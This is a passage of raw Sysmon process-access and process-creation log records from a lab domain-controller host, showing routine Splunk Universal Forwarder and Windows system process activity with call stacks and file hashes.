(0x01d6ed9e-0x9f370858) 10341000x80000000000000001982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5A-6005-5000-00000000A301}3368C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5A-6005-5000-00000000A301}3368C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E5A-6005-4F00-00000000A301}34563480C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E5A-6005-5000-00000000A301}3368C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.384{59A5CD1D-8E5A-6005-5000-00000000A301}3368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E5A-6005-4F00-00000000A301}3456C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000001969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5A-6005-4F00-00000000A301}3456C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5A-6005-4F00-00000000A301}3456C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E5A-6005-4F00-00000000A301}3456C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.378{59A5CD1D-8E5A-6005-4F00-00000000A301}3456C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.330{59A5CD1D-8E5A-6005-4E00-00000000A301}34683444C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.095{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5A-6005-4E00-00000000A301}3468C:\Program 